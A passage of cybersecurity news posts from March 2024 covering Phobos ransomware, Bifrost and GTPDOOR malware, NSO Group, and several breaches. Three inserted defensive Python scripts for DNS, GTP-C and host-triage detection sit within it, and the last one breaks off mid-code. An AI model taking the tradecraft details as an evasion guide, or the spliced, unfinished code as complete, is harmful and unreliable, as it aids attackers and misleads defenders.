    Threat actors behind Phobos ransomware attacks were also observed bypassing organizational network defense protocols by modifying system firewall configurations and evading detection by using Universal Virus Sniffer, Process Hacker, and PowerTool tools.

    Phobos maintained persistence within compromised environments using Windows Startup folders and Run Registry Keys.

    Threat actors used open-source tools such as Bloodhound, Sharphound, Mimikatz, NirSoft, and Remote Desktop Passview to enumerate the active directory and gather credentials. Phobos operators used WinSCP and Mega.io for data exfiltration to FTP servers or cloud storage.

    Phobos is also able to identify and delete data backups.

Most extortion takes place through email; nevertheless, certain affiliate groups have employed voice calls to reach out to victims. For communication, Phobos actors employ various instant messaging applications such as ICQ, Jabber, and QQ.

    The joint advisory contains indicators of compromise (IoCs) and mitigations for this threat.

    Follow me on Twitter: @securityaffairs and Facebook

    Pierluigi Paganini

    (SecurityAffairs – hacking, Phobos ransomware)

    U.S. authorities charged an Iranian national for long-running hacking campaign

    2 March 2024 at 16:10

    The U.S. DoJ charged Iranian national Alireza Shafie Nasab for his role in attacks targeting U.S. government and defense entities.

The U.S. Department of Justice (DoJ) charged Iranian national Alireza Shafie Nasab (39) for his role in a multi-year hacking campaign targeting U.S. defense contractors and private companies.

    Targeted entities include the U.S. Departments of the Treasury and State, defense contractors, and more than a dozen US companies, including firms based in New York.

According to the DoJ, from at least in or about 2016 through in or about April 2021, Nasab and other co-conspirators carried out a coordinated multi-year campaign to breach computers worldwide.

    “While purporting to work as a cybersecurity specialist for Iran-based clients, Mr. Nasab allegedly participated in a persistent campaign to compromise U.S. private sector and government computer systems,” said Assistant Attorney General Matthew G. Olsen of the Justice Department’s National Security Division. “Today’s charges highlight Iran’s corrupt cyber ecosystem, in which criminals are given free rein to target computer systems abroad and threaten U.S. sensitive information and critical infrastructure. Our National Security Cyber Section remains focused on disputing these cross-border hacking schemes and holding those responsible to account.”

    Nasab and other conspirators used spear phishing and other hacking techniques to infect more than 200,000 victim devices.

In one case, the hackers compromised an administrator email account associated with a defense contractor. The perpetrators then used this administrator account to create unauthorized accounts at the defense contractor and used them to conduct spear-phishing campaigns targeting employees of another defense contractor and a consulting firm.

    While conducting these attacks, the Iranian man worked for Mahak Rayan Afraz, a company based in Iran that claimed to offer cybersecurity services but was, in reality, a cover for the operations of the conspirators. Nasab was also involved in the acquisition of the infrastructure utilized in the long-running campaign. Nasab utilized the stolen identity of an actual individual to register a server and email accounts used in the attacks.

    “In addition to spearphishing, the conspirators utilized social engineering, which involved impersonating others, generally women, in order to obtain the confidence of victims. These social engineering contacts were another means the conspiracy used to deploy malware onto victim computers and compromise those devices and accounts.” continues the DoJ.

    The Iranian hacker faces up to 20 years in prison, plus a mandatory two-year sentence for identity theft.

    Nasab faces charges, including conspiracy to commit computer fraud, with a maximum penalty of five years in prison; conspiracy to commit wire fraud, carrying a maximum penalty of 20 years; wire fraud, with a maximum penalty of 20 years; and aggravated identity theft, which mandates a consecutive term of two years in prison.

    “Concurrent with the unsealing of the indictment, the U.S. Department of State’s Rewards for Justice Program is offering a reward of up to $10 million for information leading to the identification or location of Nasab.” concludes DoJ.


    Pierluigi Paganini

    (SecurityAffairs – hacking, Iranian national)

    U.S. Judge ordered NSO Group to hand over the Pegasus spyware code to WhatsApp

    3 March 2024 at 00:01

    A U.S. Court ordered surveillance firm NSO Group to hand over the source code for its Pegasus spyware and other products to Meta.

Meta won the litigation against the Israeli spyware vendor NSO Group: a U.S. Judge ordered the surveillance firm to hand over the source code for its Pegasus spyware and other products to the social network giant.

    NSO Group has been requested to provide details regarding the complete functionality of the pertinent spyware, covering the period one year before the alleged attack through one year after the alleged attack (i.e., from April 29, 2018, to May 10, 2020).

    In October 2019, WhatsApp sued the Israeli surveillance firm NSO Group accusing it of carrying out malicious attacks against its users.

    The legal action alleges that the Israeli surveillance firm tried to compromise approximately 1,400 individuals through WhatsApp hacking attempts.

In May 2019, Facebook patched a critical zero-day vulnerability in WhatsApp, tracked as CVE-2019-3568, that had been exploited to remotely install spyware on phones by calling the targeted device.

    At the time, The Financial Times reported that the WhatsApp zero-day was exploited by threat actors to deliver the spyware developed by surveillance firm NSO Group.

    The surveillance software developed by NSO Group was used by government organizations worldwide to spy on human rights groups, activists, journalists, lawyers, and dissidents. Security experts have detected and analyzed some of the tools in its arsenal, such as the popular Pegasus spyware (for iOS) and Chrysaor (for Android). 

    “The recent court ruling is an important milestone in our long-running goal of protecting WhatsApp users against unlawful attacks. Spyware companies and other malicious actors need to understand they can be caught and will not be able to ignore the law,” a WhatsApp spokesperson told The Guardian.

    The Judge, however, decided that NSO Group would not be forced to reveal the names of its clients or information about its server architecture.

    “While the court’s decision is a positive development, it is disappointing that NSO Group will be allowed to continue keeping the identity of its clients, who are responsible for this unlawful targeting, secret,” said Donncha Ó Cearbhaill, head of the Security Lab at Amnesty International.

    In September 2018, a report published by Citizen Lab revealed that the NSO Pegasus spyware was used against targets across 45 countries worldwide.

    In November 2019, Snowden warned of abuse of surveillance software that also had a role in the murder of the Saudi Arabian journalist Jamal Khashoggi.

In October 2019, NSO Group’s surveillance spyware made the headlines again; this time, according to Amnesty International, the malware was used to spy on 2 rights activists in Morocco.



    Pierluigi Paganini

    (SecurityAffairs – hacking, NSO GROUP)

    Security Affairs newsletter Round 461 by Pierluigi Paganini – INTERNATIONAL EDITION

    3 March 2024 at 11:58

    A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs are free for you in your email box.

    Enjoy a new round of the weekly SecurityAffairs newsletter, including the international press.

    U.S. authorities charged an Iranian national for long-running hacking campaign
    US cyber and law enforcement agencies warn of Phobos ransomware attacks
    Five Eyes alliance warns of attacks exploiting known Ivanti Gateway flaws
    Crooks stole €15 Million from European retail company Pepco
    CISA adds Microsoft Streaming Service bug to its Known Exploited Vulnerabilities catalog
    Researchers found a zero-click Facebook account takeover
    Police seized Crimemarket, the largest German-speaking cybercrime marketplace
    New SPIKEDWINE APT group is targeting officials in Europe
    Is the LockBit gang resuming its operation?
    Lazarus APT exploited zero-day in Windows driver to gain kernel privileges
    Pharmaceutical giant Cencora discloses a data breach
    Unmasking 2024’s Email Security Landscape
    FBI, CISA, HHS warn of targeted ALPHV/Blackcat ransomware attacks against the healthcare sector
    Russia-linked APT28 compromised Ubiquiti EdgeRouters to facilitate cyber operations
    Black Basta and Bl00dy ransomware gangs exploit recent ConnectWise ScreenConnect bugs
    XSS flaw in LiteSpeed Cache plugin exposes millions of WordPress sites at risk
    IDAT Loader used to infect a Ukraine entity in Finland with Remcos RAT
    US pharmacy outage caused by Blackcat ransomware attack on Optum Solutions
    Zyxel fixed four bugs in firewalls and access points
    Russia-linked APT29 switched to targeting cloud services
    A cyber attack hit Thyssenkrupp Automotive Body Solutions business unit
    Hacking firm I-Soon data leak revealed Chinese gov hacking capabilities
    IntelBroker claimed the hack of the Los Angeles International Airport
    LockBit is back and threatens to target more government organizations
    A cyber attack hit the Royal Canadian Mounted Police
    Crooks stole $10 million from Axie Infinity co-founder

    Cybercrime

    Axie Infinity co-founder loses $9.7M in 3,248-ETH wallet hack  

    Thyssenkrupp confirms cyber attack on automotive division 

    “Pantsless Data”: Decoding Chinese Cybercrime TTPs  

    US pharmacy outage triggered by ‘Blackcat’ ransomware at UnitedHealth unit, sources say 

    Threat Actor Groups, Including Black Basta, are Exploiting Recent ScreenConnect Vulnerabilities  

    Hackers Steal Personal Information From Pharma Giant Cencora

    Ransomware Groups Are Bouncing Back Faster From Law Enforcement Busts  

    The Chainalysis 2024 Crypto Crime Report

    Strike against the largest illegal German-speaking trading platform on the Internet – information on the status of the investigation and the measures taken  

    Retailer Pepco loses about 15 mln euros in Hungarian phishing attack   

    BlackCat Ransomware Affiliate TTPs 

    Malware

    Unveiling UAC-0184: The Steganography Saga of the IDAT Loader Delivering Remcos RAT to a Ukraine Entity in Finland  

    #StopRansomware: ALPHV Blackcat  

    European diplomats targeted by SPIKEDWINE with WINELOADER  

    #StopRansomware: Phobos Ransomware   

    The Art of Domain Deception: Bifrost’s New Tactic to Deceive Users 

    Hacking

    RCMP networks targeted by cyberattack

    Hackers Leak 2.5M Private Plane Owners’ Data Linked to LA Intl. Airport Breach 

    UAC-0149: Targeted selective attacks against the Defense Forces of Ukraine using COOKBOX (CERT-UA#9204)

    Lazarus and the FudModule Rootkit: Beyond BYOVD with an Admin-to-Kernel Zero-Day  

    0-Click Account Takeover on Facebook  

    CISA and Partners Release Advisory on Threat Actors Exploiting Ivanti Connect Secure and Policy Secure Gateways Vulnerabilities  

    Iranian National Charged for Multi-Year Hacking Campaign Targeting U.S. Defense Contractors and Private Sector Companies  

    Intelligence and Information Warfare 

    Biden to sign executive order on US port cybersecurity targeting Chinese-manufactured shipping cranes     

    SVR Cyber Actors Adapt Tactics for Initial Cloud Access

    Russian Cyber Actors Use Compromised Routers to Facilitate Cyber Operations

    Unmasking I-Soon | The Leak That Revealed China’s Cyber Operations  

    European diplomats targeted by SPIKEDWINE with WINELOADER  

    Cybersecurity          

    What role artificial intelligence could play in evaluating the compliance of military operations with international humanitarian law: The case study of the conduct of hostilities in Ukraine

    XSS Vulnerability in LiteSpeed Cache Plugin Affecting 4+ Million Sites

    NIST updates Cybersecurity Framework after a decade of lessons 

    Meta targeted in privacy complaints by EU consumer groups 

    Best Practices for Cyber Crisis Management  

    The CISO: 2024’s Most Important C-Suite Officer

    President Biden Blocks Mass Transfer of Personal Data to High-Risk Nations 

    Enhanced External Integrity Checking Tool to Provide Additional Visibility and Protection for Customers Against Evolving Threat Actor Techniques in Relation to Previously Disclosed Vulnerabilities  

    Cyber Security Brief 24-03 – February 2024  


    Pierluigi Paganini

    (SecurityAffairs – hacking, newsletter)

    Eken camera doorbells allow ill-intentioned individuals to spy on you

    3 March 2024 at 17:33

    Camera doorbells manufactured by the Chinese company Eken Group Ltd under the brands EKEN and Tuck are affected by major vulnerabilities.

Researchers from Consumer Reports (CR) discovered severe vulnerabilities in doorbell cameras manufactured by the Chinese company Eken Group Ltd. The company produces video doorbells under the brand names EKEN and Tuck, and its products are sold by major retailers, including Amazon, Walmart, Shein, Sears and Temu.

Photo caption (Consumer Reports): The video doorbells we evaluated have slightly different packaging and plastic casings, but you can tell they’re virtually identical, thanks to the placement of their camera lenses, motion sensors, and doorbell buttons.

    The security flaws could allow threat actors to view footage from the devices or control them completely.

    An attacker can exploit the flaws to create an account on the app and gain access to a nearby doorbell camera by pairing it with another device. Then threat actors can view footage and lock out the owner of the device.

Steve Blair, a CR privacy and security test engineer, and fellow test engineer David Della Rocca discovered that at least 10 more seemingly identical video doorbells, sold under different brand names, are all controlled through the same mobile app, called Aiwit, which is owned by Eken.

    “Thousands of these video doorbells are sold each month on Amazon and other online marketplaces, including Walmart, Sears, and the globally popular marketplaces Shein and Temu. Experts say they’re just a drop in the flood of cheap, insecure electronics from Chinese manufacturers being sold in the U.S.” reads the report published by CR.

    The researchers purchased two doorbell cameras, sold under the Fishbot and Rakeblue brands, and discovered that both devices are affected by the same vulnerabilities.

Owners of these doorbell cameras who face threats from stalkers or estranged abusive partners may be subjected to surveillance through their phones, online platforms, and interconnected smartphones.

    Some of the doorbells analyzed by the researchers also lack a visible ID issued by the Federal Communications Commission (FCC), which is a mandatory requirement for the sale of these products in the U.S.

    Some online marketplaces, such as Walmart, have removed the flawed products from their catalog and are offering refunds to their customers who purchased the devices.

    At the time of this writing, the EKEN Smart Video Doorbell Camera Wireless devices are still available on Amazon.

    “Big e-commerce platforms like Amazon need to take more responsibility for the harms generated by the products they sell,” says Justin Brookman, director of technology policy for CR. “There is more they could be doing to vet sellers and respond to complaints. Instead, it seems like they’re coasting on their reputation and saddling unknowing consumers with broken products.”


    Pierluigi Paganini

    (SecurityAffairs – hacking, camera doorbells)

    New Linux variant of BIFROSE RAT uses deceptive domain strategies

    4 March 2024 at 07:47

    A new Linux variant of the remote access trojan (RAT) BIFROSE (aka Bifrost) uses a deceptive domain mimicking VMware.

    Palo Alto Networks Unit 42 researchers discovered a new Linux variant of Bifrost (aka Bifrose) RAT that uses a deceptive domain (download.vmfare[.]com) that mimics the legitimate VMware domain.

The Bifrost RAT has been active since 2004; it allows its operators to gather sensitive information, including the hostname and IP address. BIFROSE has data-stealing capabilities, but it is best known for its keylogging routines. The researchers also observed a spike in Bifrost’s Linux variants during the past few months.

    The RAT is typically distributed through email attachments or malicious websites.

    “The latest version of Bifrost reaches out to a command and control (C2) domain with a deceptive name, download.vmfare[.]com, which appears similar to a legitimate VMware domain.” reads the analysis published by Unit 42. “This is a practice known as typosquatting. By leveraging this deceptive domain, the threat actors behind Bifrost aim to bypass security measures, evade detection, and ultimately compromise targeted systems.”

The sample binary analyzed by the experts is compiled for x86; the authors removed debugging information and symbol tables to hinder analysis.

The recent Linux samples of BIFROSE employ RC4 encryption to encrypt the collected victim data.

    The researchers observed the malware trying to contact a Taiwan-based public DNS resolver with the IP address 168.95.1[.]1.


The researchers observed the malware initiating a DNS query to resolve the domain download.vmfare[.]com by using the public DNS resolver at 168.95.1[.]1. This technique is used to ensure that the malware can successfully connect to its intended destination.
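The two network traits Unit 42 describes, a lookalike C2 domain and resolution through a public resolver instead of the organisation's own, are both detectable from logs. The script below is an added example, not Unit 42's tooling: it scores a query name's registrable domain against a watch list of legitimate domains with a plain edit distance (a lookalike within two edits is flagged, which catches vmfare.com against vmware.com), and flags queries sent to a resolver that is not on the approved list. The log format (timestamp, client, resolver, query name), the approved resolver 10.0.0.53 and the sample lines are all constructed for the example.

```python
"""Added example: spotting a typosquatted C2 domain and an unapproved resolver in DNS logs."""
from typing import Dict, Iterable, List, Optional

APPROVED_RESOLVERS = {"10.0.0.53"}   # assumed corporate resolvers
WATCHED_DOMAINS = {"vmware.com"}      # legitimate domains an attacker might imitate


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance (insert/delete/substitute) between two strings."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,            # delete ca
                           cur[j - 1] + 1,         # insert cb
                           prev[j - 1] + (ca != cb)))  # substitute
        prev = cur
    return prev[-1]


def registrable_domain(qname: str) -> str:
    """Last two labels of the name (a simplification; production code should use the public suffix list)."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])


def lookalike_of(qname: str, watched: Iterable[str] = WATCHED_DOMAINS,
                 max_distance: int = 2) -> Optional[str]:
    """Return the watched domain that qname imitates, or None if it is legitimate or unrelated."""
    reg = registrable_domain(qname)
    for legit in watched:
        if reg == legit:
            return None                      # the real thing, not a lookalike
        if edit_distance(reg, legit) <= max_distance:
            return legit
    return None


def analyse(lines: Iterable[str]) -> List[Dict[str, object]]:
    """Each line: '<timestamp> <client-ip> <resolver-ip> <query-name>' (constructed format)."""
    findings = []
    for line in lines:
        _ts, client, resolver, qname = line.split()
        reasons = []
        if resolver not in APPROVED_RESOLVERS:
            reasons.append(f"query sent to unapproved resolver {resolver}")
        legit = lookalike_of(qname)
        if legit:
            reasons.append(f"{qname} looks like {legit}")
        if reasons:
            findings.append({"client": client, "qname": qname, "reasons": reasons})
    return findings


# Constructed log lines; the second one mirrors the behaviour described in the analysis.
SAMPLE_LOG = [
    "2024-02-29T10:00:01Z 10.1.2.3 10.0.0.53 www.vmware.com",
    "2024-02-29T10:00:05Z 10.1.2.3 168.95.1.1 download.vmfare.com",
    "2024-02-29T10:00:09Z 10.1.2.9 10.0.0.53 updates.example.com",
]

if __name__ == "__main__":
    for finding in analyse(SAMPLE_LOG):
        print(finding)
```

In practice the resolver check belongs on egress firewall or NetFlow data rather than on DNS server logs: a host that queries 168.95.1.1 directly never touches the corporate resolver, so the only record of the query is the outbound UDP/53 connection.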


    The spike in Bifrost activity observed by Palo Alto Networks started in October 2023, the cybersecurity firm detected more than 100 instances (hashes) of malware samples.

    The experts also discovered an Arm version of the Bifrose malware, a circumstance that led the researchers into believing that the authors are expanding their operations.

    “The Bifrost RAT remains a significant and evolving threat to individuals and organizations alike. With new variants that employ deceptive domain strategies like typosquatting, a recent spike in Bifrost activity highlights the dangerous nature of this malware.” concludes the report.


    Pierluigi Paganini

    (SecurityAffairs – hacking, Bifrost)

    Threat actors hacked Taiwan-based Chunghwa Telecom

    4 March 2024 at 08:59

    Threat actors stole sensitive and confidential data from the telecom giant Chunghwa Telecom Company, revealed the Ministry of National Defense.

    Chunghwa Telecom Company, Ltd. (literally Chinese Telecom Company) is the largest integrated telecom service provider in Taiwan, and the incumbent local exchange carrier of PSTN, Mobile, and broadband services in the country.

Threat actors stole sensitive information from the company, including military and government documents, revealed Taiwan’s Defense Ministry. The threat actors claim they have stolen 1.7 terabytes of data that included government contracts.

    Leaked data, including a contract between the Navy and Chunghwa Telecom, are available for sale on a dark web hacking forum, Broadcaster TVBS first reported.

    “The initial analysis of this case is that hackers obtained Chunghwa Telecom’s sensitive information and sold it on the dark web, including documents from the army, Ministry of Foreign Affairs, Coast Guard Administration and other units,” the Defense Ministry said. “We have asked the contractor involved to strengthen its information security control to prevent any further incidents.”

    Taiwan’s Defence Ministry pointed out that the leaked data, including contracts, did not contain confidential information.

    “Currently, there is no significant impact on the Company’s operations,” reads a statement published by the company.

    “Government officials have said that persistent cyber threats are a form of “grey zone harassment” engaged in by China on a near-daily basis, including flying warplanes around the island and sending vessels to its surrounding waters.” reported AFP agency.

    Taiwan was a top target of cyber attacks ahead of the national elections. Cybersecurity experts attribute the vast majority of these attacks to China-linked threat actors. The country continues to be the target of an impressive number of cyber espionage campaigns.


    Pierluigi Paganini

    (SecurityAffairs – hacking, Chunghwa Telecom)

    New GTPDOOR backdoor is designed to target telecom carrier networks

    4 March 2024 at 12:02

    Researcher HaxRob discovered a previously undetected Linux backdoor named GTPDOOR, designed to target telecom carrier networks.

    Security researcher HaxRob discovered a previously undetected Linux backdoor dubbed GTPDOOR, which is specifically crafted to carry out stealth cyber operations within mobile carrier networks.

    I recently found two very interesting Linux binaries uploaded to Virustotal.

    I call this malware 'GTPDOOR'.

    GTPDOOR is a 'magic/wakeup' packet backdoor that uses a novel C2 transport protocol: GTP (GPRS Tunnelling Protocol), silently listening on the GRX network (1/n) 🧵 pic.twitter.com/IwuEcL14lx

    — HaxRob (@haxrob) February 28, 2024

The researcher believes that the threat actors behind GTPDOOR focus on systems proximate to the GPRS Roaming eXchange (GRX), such as the SGSN, GGSN, and P-GW. The threat actors focus on these components because they can give an intruder direct access to the core network of the target telecom carrier.

    A GPRS roaming exchange (GRX) acts as a hub for General Packet Radio Service (GPRS) connections from roaming users, removing the need for a dedicated link between each GPRS service provider. It was developed to facilitate a more efficient way for operators to interconnect networks, and played a large part in the transition to third-generation systems.

HaxRob attributes the GTPDOOR backdoor to the China-linked LightBasin threat group (aka UNC1945).

    LightBasin targeted and compromised mobile telephone networks around the globe and used specialized tools to access calling records and text messages from telecommunications companies.

The cyberespionage group has been active since at least 2016; according to CrowdStrike researchers, it uses a very sophisticated toolset. CrowdStrike researchers reported that the group had compromised at least 13 telecommunication companies since 2019.

    In October 2021, CrowdStrike uncovered a campaign after the investigation of a series of security incidents in multiple countries. The cybersecurity firm added that the threat actors show an in-depth knowledge of telecommunication network architectures.

CrowdStrike’s article observed the threat actor using the GPRS Tunnelling Protocol (GTP) to encapsulate tinyshell traffic in a valid PDP context session. The APT group employed an SGSN emulator to tunnel traffic to an external GGSN in another operator’s network.

    HaxRob reported that the GTPDOOR backdoor uses the GPRS Tunnelling Protocol (GTP) for C2 communications.

GTPDOOR, by contrast, does not rely on a PDP context (GTP-U, the user plane) but on specific GTP-C signalling messages carrying its own extended message structure.

“GTPDOOR is the name of Linux based malware that is intended to be deployed on systems in telco networks adjacent to the GRX (GRPS eXchange Network) with the novel feature of communicating C2 traffic over GTP-C (GPRS Tunnelling Protocol – Control Plane) signalling messages. This allows the C2 traffic to blend in with normal traffic and to reuse already permitted ports that may be open and exposed to the GRX network.” reads the analysis. “The following diagram illustrates a foreseen use of GTPDOOR. Here the actor already has established persistence on the roaming exchange network and access a compromised host by sending GTP-C Echo Request messages with a malicious payload:”


GTPDOOR allows a threat actor with established persistence on the roaming exchange network to communicate with a compromised host by transmitting GTP-C Echo Request messages containing a malicious payload.

    The researcher discovered two versions of the backdoor uploaded to VirusTotal in late 2023, respectively from Italy and China. It is interesting to highlight that both versions had a very low detection rate (respectively 1/63 and 0/63) at the time of the uploading on VirusTotal.

As the binaries were not stripped, they contain some artifacts that give us an idea of the intended platforms they were to be run on – Very outdated Red Hat Linux machines.

    Someone hasn't been keeping their systems up to date .. 🤔

    (3/n)) pic.twitter.com/hAKRJR1KFp

    — HaxRob (@haxrob) February 28, 2024

    Both binaries targeted a very old Red Hat Linux version.

GTPDOOR listens for a distinctive “magic” wakeup packet, a GTP-C Echo Request message (GTP message type 0x01). The researcher pointed out that it doesn’t require an active listening socket or service: because the implant reads from a raw socket, every UDP packet reaching the host is delivered to it in user space.

    The backdoor supports multiple capabilities, including command execution and the deployment of a reverse shell. The malicious code encapsulates requests and responses within GTP_ECHO_REQUEST / GTP_ECHO_RESPONSE messages.

    HaxRob explained that the GTPDOOR can be covertly probed from an external network by sending a TCP packet to any port number. If the implant is active, a specially crafted empty TCP packet is returned, accompanied by information regarding the host’s responsiveness.

    GTPDOOR also supports authentication and encryption mechanisms.
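Because the wakeup and the tunnelled commands ride inside GTP-C Echo Request/Response messages, a network-side check is to parse what arrives on the GTP-C port and ask whether an Echo message carries anything a well-formed one should not. The script below is an added example, not HaxRob's tooling or GTPDOOR's own format: it parses the GTPv1 header (the version, flags, message type, length and TEID fields), walks the information-element (IE) list, and reports an Echo message as suspicious when its body contains anything other than the IEs 3GPP TS 29.060 allows there (only an optional Private Extension in an Echo Request; Recovery plus Private Extension in an Echo Response). The UDP port 2123 and the IE layout come from the GTP specification, not from the write-up; the sample packets are constructed and are not real GTPDOOR traffic.

```python
"""Added example: flag GTPv1-C Echo messages whose body is not what a legitimate Echo carries."""
import struct
from dataclasses import dataclass
from typing import Iterator, Optional

GTP_ECHO_REQUEST = 0x01   # the "magic" wakeup message type named in the write-up
GTP_ECHO_RESPONSE = 0x02
GTPC_PORT = 2123          # GTPv1-C UDP port per 3GPP TS 29.060 (assumption: not stated on the page)

# IEs a well-formed Echo message may carry (3GPP TS 29.060):
# Echo Request: only the optional Private Extension; Echo Response: Recovery + Private Extension.
RECOVERY_IE, PRIVATE_EXT_IE = 14, 255
EXPECTED_IES = {GTP_ECHO_REQUEST: {PRIVATE_EXT_IE},
                GTP_ECHO_RESPONSE: {RECOVERY_IE, PRIVATE_EXT_IE}}
TV_LENGTHS = {RECOVERY_IE: 1}   # fixed-length (TV) IEs this parser knows how to skip


@dataclass
class GtpV1Message:
    message_type: int
    length: int       # header length field: bytes following the 8-byte mandatory header
    teid: int
    payload: bytes    # the IE list, i.e. body minus the optional seq/N-PDU/ext-header bytes


def parse_gtpv1(datagram: bytes) -> Optional[GtpV1Message]:
    """Parse a GTPv1 header; None for non-GTPv1 or truncated input."""
    if len(datagram) < 8:
        return None
    flags, mtype, length, teid = struct.unpack("!BBHI", datagram[:8])
    if flags >> 5 != 1:
        return None   # GTPv2 (version 2) has a different header layout; out of scope here
    body = datagram[8:8 + length]
    if len(body) < length:
        return None   # truncated datagram
    # If any of E, S or PN is set, 4 optional bytes (seq no, N-PDU no, next ext header) precede the IEs
    opt = 4 if flags & 0x07 else 0
    return GtpV1Message(mtype, length, teid, body[opt:])


def walk_ies(payload: bytes) -> Iterator[int]:
    """Yield IE type codes from a GTPv1 IE list; ValueError on anything that does not parse."""
    i = 0
    while i < len(payload):
        ie_type = payload[i]
        if ie_type >= 128:                    # TLV: type, 2-byte length, value
            if i + 3 > len(payload):
                raise ValueError("truncated TLV header")
            i += 3 + struct.unpack("!H", payload[i + 1:i + 3])[0]
        elif ie_type in TV_LENGTHS:           # TV: type followed by a fixed-size value
            i += 1 + TV_LENGTHS[ie_type]
        else:
            raise ValueError(f"unexpected TV IE type {ie_type}")
        if i > len(payload):
            raise ValueError("IE runs past end of payload")
        yield ie_type


def classify_echo(datagram: bytes) -> str:
    """'benign', 'suspicious' or 'not-gtp-echo' for one UDP payload seen on the GTP-C port."""
    msg = parse_gtpv1(datagram)
    if msg is None or msg.message_type not in EXPECTED_IES:
        return "not-gtp-echo"
    try:
        ie_types = list(walk_ies(msg.payload))
    except ValueError:
        return "suspicious"   # opaque bytes where only known IEs belong
    allowed = EXPECTED_IES[msg.message_type]
    return "suspicious" if any(t not in allowed for t in ie_types) else "benign"


def build_echo(message_type: int, seq: int, ies: bytes = b"") -> bytes:
    """Constructed-sample builder: S flag set, TEID 0, then seq/N-PDU/ext bytes, then IEs."""
    body = struct.pack("!HBB", seq, 0, 0) + ies
    flags = 0x32   # version 1, PT=1 (GTP), S=1
    return struct.pack("!BBHI", flags, message_type, len(body), 0) + body


# Constructed samples, not captured traffic.
SAMPLES = {
    "echo_request_ok": build_echo(GTP_ECHO_REQUEST, 0x1234),
    "echo_response_ok": build_echo(GTP_ECHO_RESPONSE, 0x1234, bytes([RECOVERY_IE, 0x05])),
    "echo_request_with_opaque_body": build_echo(GTP_ECHO_REQUEST, 0x0001, b"\x41" * 12),
}

if __name__ == "__main__":
    for name, pkt in SAMPLES.items():
        print(f"{name:32s} {classify_echo(pkt)}")
```

Feed it the UDP payloads of datagrams on port 2123 from a capture of the GRX-facing interface. Depending on what the operator's peers actually send, the allow-list can be tightened further: a plain Echo Request with no IEs at all is the norm on most interconnects, so even a Private Extension IE in an Echo Request may deserve a look.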

    To avoid detection, GTPDOOR changes its process name to mimic the syslog process invoked as a kernel thread. An intriguing aspect of GTPDOOR is its minimal impact on ingress firewall configurations. As long as the target host is authorized to communicate over the GTP-C port, GTPDOOR operates without necessitating significant firewall adjustments.

Below are the detection actions recommended by the researcher:

• GTPDOOR can be identified by listing the raw sockets open on the system, e.g. via lsof, looking for SOCK_RAW or raw.
• Process-name-stomped files disguised as kernel threads can be identified by their parent process not being kthreadd.
• The presence of the mutex /var/run/daemon.pid could be an indicator.
• The presence of the file system.conf could be an indicator.
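The four detection actions above can be scripted for host triage. The script below is an added example, not the researcher's tooling: on a Linux host it lists IPv4 raw sockets from /proc/net/raw and maps them to owning processes through /proc/<pid>/fd, flags processes whose name looks like a kernel thread ("[name]", the ps convention for processes with no argv) but whose parent is not kthreadd (PID 2), and checks for the file indicators. The analysis functions take plain records so they can be exercised on constructed data; the candidate directories for system.conf are an assumption, since the write-up does not give its location. Mapping sockets to other users' processes needs root, and /proc/net/raw6 (IPv6 raw sockets) is not covered.

```python
"""Added example: host triage for the GTPDOOR indicators (raw sockets, fake kernel threads, files)."""
import os
import re
from typing import Dict, Iterable, List, Tuple

KTHREADD_PID = 2                       # kthreadd is PID 2 on Linux; real kernel threads are its children
BRACKETED = re.compile(r"^\[.+\]$")    # ps-style kernel-thread name, e.g. "[kworker/0:1]"
# /var/run/daemon.pid is from the write-up; the directories tried for system.conf are an assumption.
INDICATOR_FILES = ["/var/run/daemon.pid", "/system.conf", "/etc/system.conf", "/tmp/system.conf"]

ProcRecord = Tuple[int, int, str]      # (pid, ppid, display name)


def find_fake_kernel_threads(procs: Iterable[ProcRecord]) -> List[ProcRecord]:
    """Processes that present a kernel-thread style name but are not children of kthreadd."""
    hits = []
    for pid, ppid, name in procs:
        if pid == KTHREADD_PID:
            continue   # kthreadd itself is parented by PID 0
        if BRACKETED.match(name) and ppid != KTHREADD_PID:
            hits.append((pid, ppid, name))
    return hits


def parse_proc_net_raw(text: str) -> List[int]:
    """Socket inodes listed in /proc/net/raw (first line is the column header)."""
    inodes = []
    for line in text.splitlines()[1:]:
        fields = line.split()
        if len(fields) > 9:
            inodes.append(int(fields[9]))   # 10th column is the socket inode
    return inodes


def match_sockets_to_pids(inodes: Iterable[int],
                          fd_links: Dict[int, List[str]]) -> Dict[int, List[int]]:
    """Map raw-socket inodes to PIDs whose fd table links to 'socket:[inode]'."""
    wanted = {f"socket:[{inode}]": inode for inode in inodes}
    owners: Dict[int, List[int]] = {}
    for pid, links in fd_links.items():
        for link in links:
            if link in wanted:
                owners.setdefault(wanted[link], []).append(pid)
    return owners


def check_indicator_files(paths: Iterable[str]) -> List[str]:
    return [p for p in paths if os.path.exists(p)]


def read_proc_table() -> List[ProcRecord]:
    """Collect (pid, ppid, name) from /proc; name is argv[0], or '[comm]' when argv is empty."""
    procs = []
    for entry in os.listdir("/proc"):
        if not entry.isdigit():
            continue
        pid = int(entry)
        try:
            with open(f"/proc/{pid}/stat") as f:
                stat = f.read()
            with open(f"/proc/{pid}/cmdline", "rb") as f:
                argv0 = f.read().split(b"\0")[0].decode(errors="replace")
        except OSError:
            continue   # process exited while we were reading
        rparen = stat.rfind(")")   # comm is parenthesised and may itself contain spaces
        comm = stat[stat.index("(") + 1:rparen]
        state, ppid = stat[rparen + 2:].split()[:2]
        if state == "Z":
            continue   # zombies also have an empty cmdline; not what we are looking for
        procs.append((pid, int(ppid), argv0 or f"[{comm}]"))
    return procs


def read_fd_links(pids: Iterable[int]) -> Dict[int, List[str]]:
    links: Dict[int, List[str]] = {}
    for pid in pids:
        try:
            fds = os.listdir(f"/proc/{pid}/fd")
        except OSError:
            continue   # other users' fd tables need root
        targets = []
        for fd in fds:
            try:
                targets.append(os.readlink(f"/proc/{pid}/fd/{fd}"))
            except OSError:
                pass   # fd closed between listdir and readlink
        links[pid] = targets
    return links


def triage() -> dict:
    procs = read_proc_table()
    with open("/proc/net/raw") as f:   # IPv4 raw sockets in the current network namespace
        inodes = parse_proc_net_raw(f.read())
    return {
        "fake_kernel_threads": find_fake_kernel_threads(procs),
        "raw_socket_owners": match_sockets_to_pids(inodes, read_fd_links(p[0] for p in procs)),
        "indicator_files": check_indicator_files(INDICATOR_FILES),
    }


if __name__ == "__main__":
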